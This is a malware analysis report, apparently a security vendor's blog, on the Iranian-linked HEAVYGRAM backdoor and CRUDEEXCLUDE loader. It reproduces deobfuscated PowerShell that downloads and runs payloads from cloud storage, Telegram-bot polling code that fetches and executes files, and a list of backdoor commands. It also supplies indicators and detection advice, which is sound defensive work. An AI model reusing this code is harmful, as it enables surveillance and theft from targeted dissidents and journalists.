Introduction

Group-IB Threat Intelligence has uncovered previously undocumented samples of the HEAVYGRAM and CRUDEEXCLUDE malware families.

These findings build upon public disclosures of HEAVYGRAM from the U.S. Department of Justice regarding the seizure of infrastructure linked to Iran’s Ministry of Intelligence and Security (MOIS), as well as associated indicators and technical descriptions from a recent U.S. Federal Bureau of Investigation (FBI) FLASH report.

Attributed with moderate confidence to Handala Hack, this malware has been utilized since the Fall of 2023 to target journalists, Iranian dissidents, and individuals with views opposing the government of Iran according to public sources.

This research provides a comprehensive analysis from initial delivery to the persistent HEAVYGRAM implant that facilitates screen capture, data exfiltration, remote command execution and DLL side-loading capabilities.

Figure 1. HEAVYGRAM killchain.

Figure 1. HEAVYGRAM killchain.

Post-research disclosures: Following the completion of this research, there has been an update to the FBI FLASH report expanding on HEAVYGRAM.

Key discoveries

  • March 2026: U.S. Government disclosures describe malware dubbed HEAVYGRAM linked to Handala Hack and used since Fall 2023 to target Iranian dissidents, journalists and individuals whose views oppose the Iranian government.
  • Victims were contacted via messaging applications, where they received the first stage of the malware – masquerading as a legitimate program.
  • HEAVYGRAM is a Windows backdoor supporting command execution, exfiltration, persistence and execution of additional payloads.
  • Group-IB has identified 29 new samples including associated loaders and payloads.
  • Samples rely on a network of Telegram bots, users and groups for exfiltration and command-and-control.
  • Identified Telegram infrastructure remained presented on Telegram as of 2026, rather than being deleted, although some accounts have since been taken over by unrelated actors.

Who may find this blog interesting:

  • Cybersecurity analysts and corporate security teams
  • Malware analysts
  • Threat intelligence specialists

Group-IB Threat Intelligence Portal:

Group-IB customers can access our Threat Intelligence portal for detailed information about Handala Hack, HEAVYGRAM and CRUDEEXCLUDE.

Handala Hack_Threat Actor Profile

HEAVYGRAM_Malware Profile

CRUDEEXCLUDE_Malware Profile

Background

Handala Hack

Handala Hack came into the limelight only weeks after 7 October 2023, taking its name and visual identity from the barefoot child drawn by Palestinian cartoonist Naji al-Ali in 1969. It has always branded itself as a grassroots cyber resistance movement against Israel; however, its infrastructure, tooling and target selection tell a different story.

Handala is assessed to be an online persona of Void Manticore — also tracked as Storm-0842, Banished Kitten, and Red Sandstorm —  a destructive-and-leak actor assessed to operate  on behalf of MOIS.

Void Manticore’s use of the Homeland Justice, Karma/KarmaBelow80, and Handala Hack personas is best understood not as simple rebranding, but as the deployment of politically responsive fronts against targets tied to Iran’s immediate strategic interests.

Among the clearest examples, Homeland Justice framed its destructive attacks and leaks against Albania as retaliation for Tirana’s support for the MEK; years later, amid Operation Epic Fury, Handala turned the same model of cyber-enabled coercion against Iranian dissidents, Israeli military and government personnel, U.S. service members in Bahrain, and individuals it identified as Lockheed Martin engineers supporting Israeli defense programs.

Across these and other operations, the function remains consistent: access and stolen data are converted into punishment, public exposure, intimidation, and threats of physical violence. This continuity provides the strongest argument for reading Handala not as an autonomous hacktivist collective, but as one of Iran’s coercive arms in cyberspace, wearing the mask of a hacktivist collective.

HEAVYGRAM

On March 19th 2026, the Office of Public Affairs of the United States Department of Justice announced the seizure of four domains related to MOIS.

These included Justicehomeland[.]org, Karmabelow80[.]org, and two domains which up till recently have been used as data leak and doxxing sites by Handala Hack; Handala-Redwanted[.]to and Handala-Hack[.]to.

Figure 2. Press release announcing the seizure of MOIS-linked domains. (Source: United States Department of Justice)

Figure 2. Press release announcing the seizure of MOIS-linked domains. (Source: United States Department of Justice)

Figure 3. March 19 2026 affidavit. (Source: United States Department of Justice)

Figure 3. March 19 2026 affidavit. (Source: United States Department of Justice)

While the primary subject matter of the affidavit pertains to the seizure of the aforementioned domains, sections B.39, D.46 and D.49 describe malware named “Heavygram”.

According to the affidavit, Heavygram appears to have been used to target a journalist employed by a United Kingdom-based Farsi language news organization, where the victim was contacted by a Telegram account and executed the first stage of the malware, which subsequently downloaded additional stages including a file named RuntimeSSH.exe.

The press release was accompanied by an affidavit filed on the same day – March 19th 2026.

Figure 4. Mention of RuntimeSSH.exe in the March 19 2026 affidavit. (Source: United States Department of Justice)

Figure 4. Mention of RuntimeSSH.exe in the March 19 2026 affidavit. (Source: United States Department of Justice)

The section titled “Heavygram-KeePass-Malware” describes the FBI’s investigation into another incident involving a United States-based victim.

Examination of the victim’s device revealed multiple suspicious files including RuntimeSSH.exe – a second-stage of Heavygram, masquerading as a PowerShell program, and winappx.exe – masquerading as Windows remote desktop software.

Figure 5. Section title identifies Heavygram malware in March 19 2026 affidavit. (Source: United States Department of Justice)

Figure 5. Section title identifies Heavygram malware in March 19 2026 affidavit. (Source: United States Department of Justice)

Figure 6. Suspicious file connections to Heavygram observed in March 19 2026 affidavit. (Source: United States Department of Justice)

Figure 6. Suspicious file connections to Heavygram observed in March 19 2026 affidavit. (Source: United States Department of Justice)

Figure 7. RuntimeSSH mentioned as second stage of Heavygram in March 19 2026 affidavit. (Source: United States Department of Justice)

Figure 7. RuntimeSSH mentioned as second stage of Heavygram in March 19 2026 affidavit. (Source: United States Department of Justice)

Furthermore, section E.54 assesses that Heavygram was probably used by Handala Hack to access a victim’s system.

Figure 8. Suggested connection between Handala Hack and Heavygram in March 19 2026 affidavit. (Source: United States Department of Justice)

Figure 8. Suggested connection between Handala Hack and Heavygram in March 19 2026 affidavit. (Source: United States Department of Justice)

On March 20th 2026, the FBI released a FLASH report detailing the use of Telegram for command-and-control (C2) in malware deployed by threat actors linked to Iran’s MOIS.

Figure 9. Excerpt from FBI FLASH report. (Source: U.S. Federal Bureau of Investigation)

Figure 9. Excerpt from FBI FLASH report. (Source: U.S. Federal Bureau of Investigation)

Deployed against Windows systems since the Fall of 2023, this multi-stage malware, delivered via social engineering and masquerading as programs or services – targeted Iranian dissidents, journalists and members of organizations with views opposing the government of Iran, among other individuals.

Figure 10. Excerpt from FBI FLASH report on victimology. (Source: U.S. Federal Bureau of Investigation)

Figure 10. Excerpt from FBI FLASH report on victimology. (Source: U.S. Federal Bureau of Investigation)

First stages of the malware masqueraded as legitimate applications such as Pictory, KeePass and Telegram, and contained binaries for the second stage persistent implant.

Victims were contacted by threat actors posing as known individuals or technical support via messaging applications – where they received the first stage (Telegram_authenticator.exe, WhatssApp.exe, KeePass.exe, Pictory_premium_ver9.0.4.exe).

The malware excluded directories for defense evasion and executed PowerShell, achieving persistence for the second stage persistent implant via the Windows registry.

Malware samples (MicDriver.exe/MicDriver.dll, Winappx.exe, MsCache.exe, RuntimeSSH.exe, smqdservice.exe) facilitated screen and audio recording, cache captures, encrypted file compression, file deletion and exfiltration via the Telegram API.

As part of the FBI’s FLASH report, 12 file indicators were provided. Pivoting on these filenames and hashes, Group-IB identified several additional samples publicly submitted to malware analysis platforms. Analysis confirmed these samples exhibit the multi-stage behavior and Telegram-based command-and-control described in the FLASH report.

CRUDEEXCLUDE

During analysis of HEAVYGRAM sample sets, Group-IB identified several executables adding paths associated with HEAVYGRAM as Defender exclusions and masquerading as legitimate applications – these samples align with public descriptions of malware dubbed CRUDEEXCLUDE by Google Threat Intelligence, with slight behavioral variations.

Malware Analysis

Stage 1: Delivery Methods

Across the detected sample sets, four primary methods for delivery of the HEAVYGRAM persistent implant were observed:

  • WSF/VBS scripts – which run PowerShell cradles to download or write decoy files, and download/execute additional stages from storage buckets.
  • VBS scripts and HTML applications (HTA) – which run PowerShell to poll and execute additional stages via the Telegram bot API.
  • Executables with embedded archives – containing additional files which are extracted and executed.
  • CRUDEEXCLUDE executables with embedded archives – the executables masquerade as legitimate applications, which extract and execute additional files, with some adding paths to Defender exclusions.

WSF/VBS scripts

The following WSF first stage, submitted on the 14th of April 2024 from Türkiye, contains obfuscated VBScript which checks if the C: drive volume is larger than 50GB, before executing the encoded PowerShell.

Figure 11. Deobfuscated VBScript.

Figure 11. Deobfuscated VBScript.

Decoded, it reveals a PowerShell cradle which:

  • Downloads and opens a PPTX from Vultr Object Storage.
  • Downloads and extracts a ZIP archive from Vultr Object Storage.
  • Executes one of the extracted files (RuntimeSSH.exe) – the HEAVYGRAM persistent implant.
$path2 = $Env:temp+'\Artificial intelligence.pptx.pptx';
$client2 = New-Object System.Net.WebClient;
$client2.downloadfile(
    'hxxps://sgp1[.]vultrobjects[.]com/jttrepijgdb/
     Artificial%20intelligence.pptx',
    $path2);
Start-Process -FilePath $path2;

$path3 = $Env:temp+'\a650bc3533b424d03[.]zip';
$client3 = New-Object System.Net.WebClient;
$client3.downloadfile(
    'hxxps://sgp1[.]vultrobjects[.]com/jttrepijgdb/efg_d4[.]zip',
    $path3);

Expand-Archive `
    -Path $path3 `
    -DestinationPath `
        'C:\ProgramData\ssh-cache-default\
         {8bda3848-495e-43f4-8d10-7d37a67f1604}' `
    -Force;

Start-Process `
    -FilePath `
        'C:\ProgramData\ssh-cache-default\
         {8bda3848-495e-43f4-8d10-7d37a67f1604}\
         RuntimeSSH.exe'

VBS scripts and HTAs Polling for Stages

Another variant submitted on the 13th of April 2025 from Germany leverages an HTA file with an embedded decoy video, executing obfuscated VBScript which checks that the C: drive volume is larger than 50GB, prior to executing the encoded PowerShell.

Figure 12. HTA file.

Figure 12. HTA file.

Figure 13. Deobfuscated VBScript.

Figure 13. Deobfuscated VBScript.

The executed PowerShell initially collects the victim machine’s hostname, and embeds it in a check-in message sent using the Telegram bot API.

$hn = hostname; $response = Invoke-RestMethod
-Uri "hxxps://api[.]telegram[.]org/bot783XXXX576:
/sendMessage?chat_id=-100239XXXX515&text=🟢
``$hn``%20is%20online&parse_mode=Markdown" -Method Get;

Another Telegram bot API endpoint is defined, and the victim machine’s %TEMP% path is collected.

$address = "hxxps://api[.]telegram[.]org/bot772XXXX818:"

$local_path = $Env:temp

The primary functionality lies in two functions; Get-BotUpdates and BringContent.

Get-BotUpdates is responsible for polling updates from the Telegram bot:

function Get-BotUpdates {
    param (
        [int]$offset = 0
    )

    $address2 = "$address/getUpdates?offset=$offset"
    $response = Invoke-RestMethod -Uri $address2 -Method Get
    return $response.result
}

BringContent handles file attachments received through the Telegram bot – downloading incoming files and conditionally branching execution:

  • If the attachment’s filename ends with “zip” – the archive is extracted to C:\ProgramData\Kee_Pass, the file C:\ProgramData\Kee_Pass\KeePass.exe is executed, and the process exits.
  • If the attachment’s filename does not end with “zip” – the file is executed.
  • If the attachment’s filename ends with “exe” – the process exits.
function BringContent {
    param (
        [string]$contentId,
        [string]$contentName
    )

    $contentPathResponse = Invoke-RestMethod `
        -Uri "$address/getFile?file_id=$contentId" `
        -Method Get

    $contentPath = $contentPathResponse.result.file_path

    $bringAddress = "hxxps://api[.]telegram[.]org/file/" +
        "bot772XXXX818:/$contentPath"

    $destination = Join-Path `
        -Path $local_path `
        -ChildPath $contentName

    Invoke-WebRequest `
        -Uri $bringAddress `
        -OutFile $destination

    Get-BotUpdates -offset $offset

    if ($contentName.EndsWith("zip")) {
        Expand-Archive `
            -Path $destination `
            -DestinationPath "C:\ProgramData\Kee_Pass" `
            -Force
        Start-Process `
            -FilePath "C:\ProgramData\Kee_Pass\KeePass.exe" `
            -ArgumentList "am22350022003300440055"
        exit
    } else {
        Start-Process `
            -FilePath "$local_path\$contentName"
    }

    if ($contentName.EndsWith("exe")) {
        exit
    }
}

Another function is defined which handles log messages that are sent via the Telegram bot API, and the program checks for a lockfile and sends a check-in message before entering an infinite loop – polling for updates and handling incoming files:

try {
    $lockFilePath = "C:\ProgramData\lockfile49c4e.lock"
    
    if (Test-Path $lockFilePath) {
        PrintLog -message "Another instance is already active. Exiting..."
        exit
    } else {
        New-Item -Path $lockFilePath -ItemType File -Force | Out-Null
    }
} catch {
    PrintLog -message $_
}

PrintLog -message "is online now!"

$offset = 0
while ($true) {
    try {
        $updates = Get-BotUpdates -offset $offset

        foreach ($update in $updates) {
            $offset = $update.update_id + 1

            if ($update.message.document) {
                $contentId = $update.message.document.file_id
                $contentName = $update.message.document.file_name

                BringContent -contentId $contentId -contentName $contentName
            }
        }

        Start-Sleep 1
    }
    catch {
        PrintLog -message $_
    }
}

The HTA application contains an MP4 video embedded from Vultr Object Storage, which was created on 2025:04:12 12:15:31 UTC based on its metadata, and is assessed to be taken in Iran.

Figure 14. Example stills from embedded decoy video.

Figure 14. Example stills from embedded decoy video.

The video contains no legible audio or conversation, but logos of two Iranian organizations are visible: the Imam Khomeini Relief Foundation (کمیته امداد امام خمینی) and the Emdad-e Velayat Qard al-Hasan Fund (صندوق قرض الحسنه امداد ولایت).

Figure 15. Imam Khomeini’s Relief Foundation (left) and Emdad-e Velayat Qard al-Hasan Fund (right)

Figure 15. Imam Khomeini’s Relief Foundation (left) and Emdad-e Velayat Qard al-Hasan Fund (right).

Executables with Embedded Archives

Windows screensaver files have also been used to deliver HEAVYGRAM implants. The following Delphi-based sample named “لیست تکمیلی و اخراجی.scr” was submitted on the 2nd of December 2023 from Germany.

Notably, the filename translates from Persian to “Supplementary and expelled list”, suggesting it is tailored to a victim profile of academics or students.

The executable reads the COMPUTERNAME environment variable, comparing it to a hardcoded string which displays a message box on match stating: “This system has been authenticated. Use another system for authentication”.

An internet connectivity check is performed by opening a TIdTCPClient connection to google[.]com, displaying “This program requires an internet connection to continue working” on failure and exiting.

The executable contains an embedded RCDATA resource, which is loaded, dropped to disk as a ZIP archive and extracted.

Figure 16. Embedded ZIP archive.

Figure 16. Embedded ZIP archive.

The ZIP archive named Runtime_SSH[.]zip contains the HEAVYGRAM implant (RuntimeSSH.exe) alongside other files required for its execution.

Once the archive is extracted, the first stage executes RuntimeSSH.exe.

Additionally, a decoy text file named “دانشجویان اخراجی.txt” – which translates from Persian to “Expelled students” is opened.

The contents of the file list three individuals and include, for each entry, a first and last name, student number, major, enrollment year, and degree level.

CRUDEEXCLUDE with Embedded Archives

A number of Delphi-based executables have also been identified which masquerade as legitimate applications such as Pictory and Telegram – presenting a graphical user interface mimicking that of their legitimate counterparts.

Figure 17. Masquerading applications – Group-IB Malware Detonation Platform.

Figure 17. Masquerading applications – Group-IB Malware Detonation Platform.

The Pictory-like application pictured above adds three paths to Defender exclusions via PowerShell:

  • %ALLUSERSPROFILE%\MicrosoftDistribution\sysmain
  • C:\Users\<username>\Downloads\Telegram Desktop
  • %ALLUSERSPROFILE%\SMQDServicePackages\488ht1-8ww648q
Figure 18. Paths added to Defender exclusions – Group-IB Malware Detonation Platform.

Figure 18. Paths added to Defender exclusions – Group-IB Malware Detonation Platform.

Similarly to the previously described stage, the executable contains base64-encoded data in an embedded resource.

Figure 19. Embedded base64-encoded text.

Figure 19. Embedded base64-encoded text.

The application resolves %APPDATA% via GetEnvironmentVariableW, loads the embedded resource saving it to %APPDATA%\downloaded_file26.txt, starts a decoding routine reading the dropped file and rewriting it as %APPDATA%\ExtractedFile26.dat.

If %APPDATA%\ExtractedFile26.dat exists, the file is copied as File26[.]zip, and then deleted.

Finally, the ZIP archive is extracted to C:\ProgramData\SMQDServicePackages\488ht1-8ww648q, and the extracted HEAVYGRAM implant binary is launched with CreateProcessW.

Being written in Delphi and given the applications’ behavior, they show an overlap with publicly documented descriptions of CRUDEEXCLUDE.

Stage 2: Persistent Implant

HEAVYGRAM’s core functionality lies in its second stage – an executable written in Python and compiled with PyInstaller.

The second stage relies on several additional files, including an internal config.py file – containing hardcoded configuration strings, and rantom.txt – an encrypted text file with custom function definitions which gets decrypted at runtime.

Figure 20. Configuration file.

Figure 20. Configuration file.

Initially, the second stage creates a mutex to prevent duplicate instances, and creates its configuration file at %APPDATA%\Config\config.xml.

Next, it reads the configuration file, storing the Telegram bot token and user/group ID, and collects the victim machine’s hostname.

Figure 21. Startup and initialization logic.

Figure 21. Startup and initialization logic.

Two Telegram handler functions are registered:

  • analyze_command – processes text messages received through the Telegram bot.
  • downloader – handles attachments received through the Telegram bot.
Figure 22. Message handlers and main execution loop.

Figure 22. Message handlers and main execution loop.

Command handler: analyze_command

Incoming text messages are routed based on a prefix delimiter system:

  • Prefix @@ – used to execute arbitrary system commands via os.popen, returning command output directly to the Telegram command-and-control channel.
  • Prefix ** – writes the message body to C:\ProgramData\ur.txt, likely used for staging configuration updates, secondary payloads or operator notes.
  • Prefix ## – backdoor command suite which supports the commands shown in the table below:

 

Command Function
runexe Start an arbitrary process on the host
whois Retrieve the host’s public IP address via hxxps://api[.]ipify[.]org
runtro Execute a secondary trojan payload
cht Dynamically update the C2 Telegram bot token and operator user ID
regtro Install the trojan payload into Windows autorun registry keys
reg Install the main malware executable into Windows autorun registry keys
dt Exfiltrate Telegram Desktop application data from %APPDATA%\Telegram Desktop and %LOCALAPPDATA%\Packages\TelegramMessengerLLP
si Execute systeminfo and exfiltrate host details
pl Enumerate running processes, including access-level information
ss Capture and exfiltrate a screenshot of the active desktop

Attachment handler: downloader

Attachments received through the Telegram bot are handled based on filename pattern matching.

DLLs ending with .dll and starting with any of: dev, bit or kee:

  • The legitimate Windows binary C:\Windows\SysWOW64\bthudtask.exe is copied to C:\Windows \SysWOW64\ (with intentional trailing space).
  • bthudtask.exe is executed, side-loading the DLL.
  • The spoofed directory C:\Windows \SysWOW64\ and its contents are deleted.

ZIP archives starting with reg and ending with .zip:

  • The directory C:\ProgramData\SMQDServicePackages\488ht1-8ww648q is created.
  • The archive is extracted to the created directory.

Generic ZIP archives ending with .zip:

  • The archive is downloaded to %APPDATA%\SMQDService and extracted to %ALLUSERSPROFILE%\MicrosoftDistribution\sysmain.

KeePass payload (keepass.exe):

  • The file is downloaded to C:\ProgramData\KeePass\.

Generic executables ending with .exe:

  • The file is downloaded to %APPDATA%\SMQDService and executed.

The persistent implant handles C2 communication via two functions:

  • send_initial_message – transmits an initial connection beacon containing the full computer domain name of the compromised host.
  • send_health_msg – a background thread that sends a heartbeat message every 24 hours with the host’s domain name, confirming that the implant remains active.

Telegram Infrastructure Analysis

Across the identified samples, two primary configurations were identified:

  • Single bot configurations – where command-and-control is carried out using one Telegram bot and group
  • Dual-bot configurations – where one bot is used for check-ins in parallel with a user or group, and a secondary bot for logging and stage polling alongside a group

Note that several bots, users and groups were reused across multiple samples.

Figure 23. Observed single-bot clusters.

Figure 23. Observed single-bot clusters.

Figure 24. Observed dual-bot clusters

Figure 24. Observed dual-bot clusters

The majority of these groups share a consistent visual and naming convention, using a seemingly random portrait of a woman as the image, and a Persian female name as the title. At least one of the identified groups was found to have used the full name and photograph of a female Iranian dissident.

The following users were identified as creators and administrators of these groups, and are assessed to be primary operator-controlled accounts responsible for infrastructure and post-compromise activity on victim machines:

Attribution

Group-IB attributes HEAVYGRAM to Handala Hack with moderate confidence:

  • A U.S. Government affidavit links the use of Heavygram to Handala Hack on the basis of probable cause, and discloses associated filenames later corroborated by the FBI FLASH report.
  • Iran International, a London-based Farsi-language news outlet targeted by Handala Hack, confirmed in July 2025 that leaked information about its journalists stemmed from intrusions in summer 2024 and January 2025 involving compromised Telegram accounts – aligning with HEAVYGRAM’s Telegram session data exfiltration capabilities. Both intrusions fall within the Fall 2023 onward timeframe described in the FBI FLASH report, which separately assesses that some of the information Handala claimed to have acquired and posted in a July 2025 hack-and-leak operation was obtained using this malware.
  • Tradecraft aligns with prior Handala Hack activity: use of Vultr Object Storage, decoys tailored to Persian-speaking victims, and Delphi-based tooling.

Conclusion

Group-IB’s investigation expands the publicly available understanding of HEAVYGRAM and the infrastructure supporting its deployment. The newly identified samples demonstrate a flexible, multi-stage infection chain in which operators combine tailored social engineering, application masquerading, defense evasion and persistent access to compromise targets of interest.

The extensive use of Telegram across operations is particularly notable, providing operators with a natively encrypted command-and-control channel that has low setup, maintenance and rotation cost. Much of the identified Telegram infrastructure continues to remain present on Telegram as of 2026, rather than deleted,  although some of the identified accounts have since been taken over by unrelated actors and repurposed for other activity.

Taken together with U.S. Government disclosures, victimology, Persian-language decoys, infrastructure overlaps, and previously observed tradecraft, these findings provide additional insight into how HEAVYGRAM has been used in operations targeting journalists, dissidents, and other individuals of interest to Iran. The activity further illustrates how tooling associated with the actor can support targeted collection while feeding broader intrusions and hack-and-leak operations.

Recommendations

For Individuals

  • Only install and use applications from trusted official sources and channels of vendors.
  • Verify the authenticity of contacts on social media and instant messaging applications via other trusted channels.
  • Restrict privacy settings of social media and instant messaging applications – where available, to the minimum required functionality.
  • Exercise caution around suspicious files.
  • Ensure latest operating system updates and security patches are installed on personal devices.

For Organizations

  • Leverage Threat Intelligence services for the latest information and updated threat feeds.
  • Educate end-users about best practices and promote awareness and vigilance around phishing.
  • Immediate Response
    • Isolate any host exhibiting the indicators of compromise listed in this research.
    • Audit autorun registry keys (HKCU\Software\Microsoft\Windows\CurrentVersion\Run and HKLM equivalent) for unauthorized entries.
    • Search file systems for the spoofed directory pattern C:\Windows \ (with trailing space).
    • Review outbound traffic to api[.]telegram[.]org for anomalous bot API calls.
  • Detection Engineering
    • Deploy endpoint detection rules for bthudtask.exe execution outside its legitimate path.
    • Monitor for directory creation with trailing spaces in system paths.
    • Alert on os.popen or equivalent shell invocations from non-standard processes.
    • Flag access to %APPDATA%\Telegram Desktop and TelegramMessengerLLP directories by unauthorized processes.
  • Hardening
    • Restrict execution of binaries from %APPDATA%, C:\ProgramData, and user-writable directories via application control policies.
    • Block or monitor outbound HTTPS traffic to api[.]telegram[.]org at the network perimeter where Telegram is not a sanctioned business tool.
    • Enforce code signing validation to prevent unsigned or improperly signed DLLs from loading.

Frequently Asked Questions (FAQs)

What are HEAVYGRAM and CRUDEEXCLUDE?

arrow_drop_down

HEAVYGRAM is a multi-functional Windows backdoor/persistent implant that leverages the Telegram bot API for exfiltration and command-and-control, and allows operators to execute commands remotely, exfiltrate data and screenshots, establish persistence and run additional payloads.

CRUDEEXCLUDE is a Windows malware which often disguises itself as a legitimate application, adds Defender exclusions, and has been associated with HEAVYGRAM deployments.

When were these tools first used?

arrow_drop_down

Public sources indicate that HEAVYGRAM has been used since the Fall of 2023. The earliest samples identified align with this timeline, dating back to the 13th of September 2023.

What is the victim profile?

arrow_drop_down

Publicly disclosed targets include Iranian dissidents, journalists opposed to Iran (including a UK-based journalist), members of organizations whose beliefs run counter to Government of Iran narratives, and other individuals perceived as threats by Iran – including at least one US-based victim.

However, the targeting profile could extend to any individual of interest to Iran.

How were victims targeted?

arrow_drop_down

Public disclosures indicate victims were contacted via Telegram, where they received the first stage of the malware which is designed to masquerade as a legitimate Windows program or service.

Disclosures and discovered samples included first stages masquerading as a Telegram application from the “official” Telegram technical team, KeePass, and a “premium” version of the AI-powered video creation platform; Pictory.

Indicators of Compromise (IOCs)

File Hashes

 

Type SHA256 SHA1 MD5
First stage 8219453084f370cee43aafe27b9def6b9d3d75fb31bacd7e2fa1d82d617f26dd 0190940243f6535f51d43edafac943d493159e14 b3c1a3eebefafe1346c6a864b5423182
RAR artefact 47fa634b13b8ba35bd5669da3059a0c7577911c16584a2ff173368f848825de4 88a8d118ee190ac36cf684c2992f6ddd2dda517b b2f6f40570ac9085b5463fdb623560de
Implant/Backdoor d2d19c7f2e4a5fdcfb34b26f048077d2c4fe26637ed2c90e9e9bdf32307c377e 9108466c98df01033371483a789a0c23372c52f2 16602375fc2dae1eb54580ab7eda6567
Encrypted text artefact 3befcca381deb6b492aa0c4eba222c29a25192aeacbf2315798c4754a4b74e81 53d41445e176bf53c5acd2dad533eda612b05855 7d3cce1f9dbaed585b61e6e903d69b9b
ZIP artefact 6ddd145622cde2d2f91dace7e1f7edef22f4d49d3645fa9ad4bdb772829c30bf 3549f6df9c14b70d2308b7b12033218e77fe1dc7 d6756063230136f8c55ae27f1a4b0112
First stage 4a3aa8f4f0eb37be9778fbdf0b7dd282fc407557da61735d2ae9cfc73ee2aa81 9391928e5163ff791c1b4bc535f4ac92510810a6 5507a3e71aade582dd226b63b1930c56
ZIP artefact 844108a626c15395059efa355a66c8462af0c822d8219b35b6038d9d42dcf61d ef3f7292cb2f91f9a34953b875eb018b3ef889d2 ca65cc67247d0702ca34eb7b06873bec
Implant/Backdoor 65359388b49ae2a982111ebe8ac837d0f3294ceab7a712df20d0f6c19bf3029e 4a2658c66f3aeabdb05f56ba88d587683319ce6d 4dcfa4317f2111109cd41f457541ed2b
ZIP artefact ec9d3e32a4e78f8cc9581f5cf030f0594debee1ce67d2d0759aff3ec1c720b35 5d3cde9f6971ec35431cbb113b6b4bc292ea5db0 a1ca53f09b0c6fe3b3b57b5202192d60
Implant/Backdoor 5380ffda12f97cf4d8e0fe02e0580aa1a48b4b6da95e7f8a30029ad125c51b3f 2b11bccdea89d428610c15bea1fba417ab8681a6 b66bd18de204d405500dc079876b7cbf
First stage e9d2e4e8fac6420ca3b3a3a63a3d313dcfb236a24a11889d6923dd9b42a777d4 6d9817f5066be757f5f09b067a80fed3cfe280f6 14698d3a03216daa2cf6f39e4f1c4031
First stage 8ad63d4d30cd28391318e26f4e9464f302b0a12675a721967d4f2173ed6cfe8a af9d13e27c8eedc30dd78f237013b239cf23f35d 0a656287defcbd8a9c47385b805993df
ZIP artefact 3f1313c813e51edf5734d9fb99eb93d6c3aa6c309e3f0a6a4878291c5b2ec73b f269488e2128128f234ee2e996489317bfa4720b d9418fb432631021a15fb896b365d608
Implant/Backdoor 138a4c9cd617912c2269fae64b6b12d57e926a36c2c62f25ee05a32cdf102212 8c6b6236420c876989af36e3a9e648a00f3000c9 fefaefbf09841cef739d090305edc7a4
Implant/Backdoor bb56792212abe160fff643631fb69b2081601e6310fc6669fd9d52d690ec1903 6fcf829720f425f81a6b35ac5f05fa94775429eb c8aeca21d10f6bbb78e1f2a67d78fcad
ZIP artefact 7477f4f25d1cfc3dfb1267e35ab4bcf0b30b8c7ec9677a8d1849ee7d17bc15aa 168caccbe59473091aa4fbbebba6257aed17985e 87f7d0b30f7905d282fb464f5ad6c6cf
CRUDEEXCLUDE executable 2deeeda412c40ad515dca940916a376d187219ed09ed697b4be4879b7091ec53 5dd86e22b882d52c67d274e3297694009d13fb96 6cae314ddcd821dd2a60dff1fa02460a
ZIP artefact b0308c91a56209222b178e7099ee03a7b0d06a0e473f042fb2d3c144a07484fa 88816b1262eaf819edebb93dc883b3082cc64c34 be98163e7fea224af382a2251252ce4d
Implant/Backdoor c9e5cbc98e91aa35a260a1f85d7a5605dc7aa8d2d0b71eb6f063147d4dfa1b5f fec45095576d13a20a6d42096fcadc2d8f6dddd8 970fc0fcf3bc5a933d10e8413536f27f
First stage d40d730bcfa4cc7f1ee070f6ce863b03acb81af0a4d66feaec285e1205258b35 33e9e5463c12c0a21a7ab37fb7496ab2c5c40bb4 5f3271ba8840be547b1f3a42ea28ebe0
Encrypted text artefact 067d93741bcab16810ef15c11941245229519470dc7b24793dd1d3a7addacaae 2fa0eb74f8a527d938f8538d66bcdebcc9771527 a3394ef7ffa7e88b2e7efaee4617fe04
ZIP artefact cbe9e32393529cd79e19a639a1d2da93fba06082be2bdb0c04241f269f98c773 ba3874ca96f9bca1daff22ef49ea7505d52b40d4 94779909cc510194900c3cc17d1194c8
Implant/Backdoor 4a3b003994112b4dd24ac8b9cc4757f4a12576b57b3cc8f5028d85fbceb7c405 0fe3cf4cabadedb382b0833dcb6ba74db3242022 7e23ffadb664b0e53d821478a249d84c
CRUDEEXCLUDE executable e8b633dcad173eb41ef02686b46779a4a0e53df7f6c63039a798f2db5eb83afc 704119320f7ed10dc7707833218468d455d3c5fd 1e6b601f733bc40eaa58916986bfc5b9
First stage ffceb438127725a6a664aba5021f7625bd8c22b3f76447de91b728839136c9c3 7ee579a1fa697f66d80103a867cf706f67bba32b 1d947084fdf25e07ec8bcdaf0cec508a
Implant/Backdoor 0d74156089292eee308017c8e8a7550739ecb6149ff379810f7c54b1dbaabc91 87dcba4957396a9e594ed1d133bc115315763002 e51ff37fb431767dcdec0b5e6d2a786a
RAR artefact 886d04b78017f721ed458158e3c31300cb7f9d512481a50f21461711438e1c5e ac5939a17ec6455b6b7ae0f04c5b71b1db0d00c5 42215c1fb55d945b4d2a0bb188ca4dcf
ZIP artefact 2640fc95373dd299cc61966c2df5ba9e013280ee02944d11bb4d1f70ee57aa30 44068866546ffea6ef8ab8a639c2151b13f9fd6e cbe1743e9aebd3e3002b2b005deb332c
Decoy RTF 58fb875fedf57055c3fedf59fdedb9ebffbf452a0f7f21608abb069cc13effb9 ea7071abca429f28bfe629a913513c6d604771f4 4dd0cbdad60e65fb8cd6999bd9359444
First stage c4e194747d9a268ff56ac1f0708745cbcc164751dcaa24f1a5a15acbe9c4d998 43d9af0c411110905ab4ddf4e4f713101c74d9de 8e9e81d1b252d7fa99579e9cf2e4b4ba
Decoy MP4 a85ce7dde7f83f116436adbdaa8e782e3af0f0ce87ec6534ec7b8ea83bb33eed 292887ea4406fce26773992af0bd7dc34951aa84 66fd60d03613decacc3c42d94dd9aab8
CRUDEEXCLUDE executable 0aee700463efe5155d816b0f4d44edc9f4b4579156159b361d1f663b4143c4fd 5f899031ec31431ff0f5fcaf4ccf5cd9484b2066 26892452f724581530c45287c8b7bc67
First stage B9086413E7B6A0C6A11C25D14C22615F
First stage 7402F2F9263782A4C469570035843510
Second stage EBDD9595B79B39F53909D862499DBC94
DLL utility F8B5554808428291ACC65D1FD2EFE01C
Second stage 481C5B5E69A08C3DF206C59FD8DDC0DC
Encrypted text artefact 2965817D063F1E8F9889F9126443D631
Second stage D70EBF20E3D697897BAD5BEBF72EA271
Second stage 3E7A2FCEF1D038D05B20148C573A6499
First stage 65e2dbe5c6b670f663d93fd65608470091a231803b4f449bb00e99ebf76eddb7 6dd639542464a647e3816af896fb1320aff64ba5 602174f6e691d6845ac645b68f1f2538

Network Indicators

hxxps://sgp1[.]vultrobjects[.]com/jttrepijgdb/Artificial%20intelligence.pptx
hxxps://sgp1[.]vultrobjects[.]com/jttrepijgdb/efg_d4[.]zip
hxxps://ppt1[.]sgp1[.]vultrobjects[.]com/myvideo.mp4
hxxps://ppt1[.]sgp1[.]vultrobjects[.]com/RuntimeSSH_def7[.]zip
